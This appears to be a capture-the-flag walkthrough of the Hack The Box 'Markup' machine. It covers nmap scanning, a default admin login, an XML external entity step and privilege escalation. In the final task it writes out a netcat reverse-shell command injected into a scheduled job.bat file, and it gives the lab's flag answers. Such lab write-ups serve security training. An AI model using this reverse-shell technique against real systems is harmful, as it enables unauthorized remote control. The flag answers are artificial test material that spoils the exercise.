# Markup

## Initial Scan

```nmap
sudo nmap -T4 -v 10.129.202.209 -oA Markup-Basic
sudo nmap -T4 -p 22,80,443 -sV -sC -v 10.129.202.209 -oA Markup-sv
```

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F87Vrl9j0sh3J4WyMPjrY%2Fimage.png?alt=media&#x26;token=19077f17-f6ee-47cc-92ec-714560e271eb" alt=""><figcaption></figcaption></figure>

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FzTbLXbTBdyYeP5ayxFjT%2Fimage.png?alt=media&#x26;token=f4cfddfa-4ebf-4d93-9b41-03957b3d4347" alt=""><figcaption></figcaption></figure>

## Task 1

What version of Apache is running on the target's port 80?

Answer: 2.4.41

## Task 2

What username:password combination logs in successfully?

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FC6jdqzXSMlJB0rGhs532%2Fimage.png?alt=media&#x26;token=d19e062a-b219-4f25-ad23-31b812d6ea77" alt=""><figcaption></figcaption></figure>

Just tried basic default logins

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FcrYNwTal7MEK2xvtHCOn%2Fimage.png?alt=media&#x26;token=2d7e40ff-1c86-4567-82c9-38ba4a3cfb60" alt=""><figcaption></figcaption></figure>

Answer: `admin:password`

## Task 3

What is the word at the top of the page that accepts user input?

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FT5YahMdcJBca0TYYMMuV%2Fimage.png?alt=media&#x26;token=1f0e9778-e6fc-4031-873f-5795de6063a2" alt=""><figcaption></figcaption></figure>

Answer: Order

## Task 4

What XML version is used on the target?

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FBW1BKjRzBuLIeyzfdy2X%2Fimage.png?alt=media&#x26;token=37163232-e438-4a5c-a19a-cc1e3306c94a" alt=""><figcaption></figcaption></figure>

Answer: 1.0

## Task 5

What does the XXE / XEE attack acronym stand for?

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FJvJMjWc8aCRdOa3HsKSF%2Fimage.png?alt=media&#x26;token=f7c7db15-caae-4e10-b5c2-629a099e475e" alt=""><figcaption></figcaption></figure>

Answer: XML external entity

## Task 6

What username can we find on the webpage's HTML code?

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FAnkwxM1PIgPStPmpuT1z%2Fimage.png?alt=media&#x26;token=610ef709-6cb3-4f23-b9d4-f7626e7cb97a" alt=""><figcaption></figcaption></figure>

Answer: Daniel

## Task 7

What is the file located in the Log-Management folder on the target?

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Ftn8Uh3TjBP7XZecOiTwP%2Fimage.png?alt=media&#x26;token=479878f1-439d-4f11-a479-9c0f2a6b492f" alt=""><figcaption></figcaption></figure>

Put the rsa into a file on our machine

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FC14ii17U5hDKA5GF0M5P%2Fimage.png?alt=media&#x26;token=618823de-876c-4ed2-b1fb-ec5662048d11" alt=""><figcaption></figcaption></figure>

Login as daniel

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FCWmeo0BpVPHEy7x03NgZ%2Fimage.png?alt=media&#x26;token=fc364ed6-3c45-44f6-83e1-b4179b4aec1e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FQMotQWsRCM8NB2RreTrx%2Fimage.png?alt=media&#x26;token=027b81a0-f22f-47e1-89d8-0daa068bfc99" alt=""><figcaption></figcaption></figure>

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FU700JO8RuomYPK094FOt%2Fimage.png?alt=media&#x26;token=4a738122-b2a3-4b8c-9ecb-c86756856835" alt=""><figcaption></figcaption></figure>

Answer: job.bat

## Task 8

What executable is mentioned in the file mentioned before?

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FpiR0MzPk9BPPUYdKWsDB%2Fimage.png?alt=media&#x26;token=a3b66a6e-6187-422c-834f-378848d0273f" alt=""><figcaption></figcaption></figure>

Answer: wevtutil.exe

## Task 9

Submit user flag

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FjVTfcJqCNW5BLt0ZNyjo%2Fimage.png?alt=media&#x26;token=0f25c578-08a8-4097-86a8-6a4b8ad9d851" alt=""><figcaption></figcaption></figure>

Answer: 032d2fc8952a8c24e39c8f0ee9918ef7

## Task 10

Submit root flag

Run winpeas

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FuSvrwaCXXnIeWpDGkaOQ%2Fimage.png?alt=media&#x26;token=46900eb5-15bf-430a-9f7c-6853ec2a7a72" alt=""><figcaption></figcaption></figure>

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FnqEohFQClrnae7ce384c%2Fimage.png?alt=media&#x26;token=795fee23-5d03-4c68-b1df-7b5e3f2e9c37" alt=""><figcaption></figcaption></figure>

Under the section "Searching executable files in non-default folders with write (equivalent) permissions (can be slow)" We see

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Fpcz3x8oXGIpetUWP95qq%2Fimage.png?alt=media&#x26;token=b880376a-5fb2-45e5-9c69-76dc9282c582" alt=""><figcaption></figcaption></figure>

Which from the previous question we have looked at. Run Let's run netcat to connect back to us as admin.

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F1CULkemHQT4GFe0FHfsY%2Fimage.png?alt=media&#x26;token=05c9e185-aceb-455f-8d67-91c02415bcc1" alt=""><figcaption></figcaption></figure>

Get nc.exe onto the target

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FsHOwaVvllppqKHLQGrlD%2Fimage.png?alt=media&#x26;token=2e78b337-2f6a-4252-b449-b57cc495ffbd" alt=""><figcaption></figcaption></figure>

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FxuGPDhqvH3nJThcfvJby%2Fimage.png?alt=media&#x26;token=601a2e47-1089-4b57-a211-114abc6c039c" alt=""><figcaption></figcaption></figure>

Run it to get admin on the system

```
echo C:\Users\Daniel\nc64.exe -e cmd.exe 10.10.14.38 1234 > C:\Log-Management\job.bat
```

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Fgjwf21Eo7KtNsMXUrc7J%2Fimage.png?alt=media&#x26;token=2d24d31f-72b9-4735-b3f2-39acd2490aa6" alt=""><figcaption></figcaption></figure>

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FP3mixbq9acbOkvtyCBEv%2Fimage.png?alt=media&#x26;token=413f13db-1dd6-4bfa-9f48-14c1d29cc9f2" alt=""><figcaption></figcaption></figure>

I had troubles getting the shell to pop, which apparently is common, the root flag is under: `C:\Users\Administrator\Desktop\root.txt`

Answer: f574a3e7650cebd8c39784299cb570f8
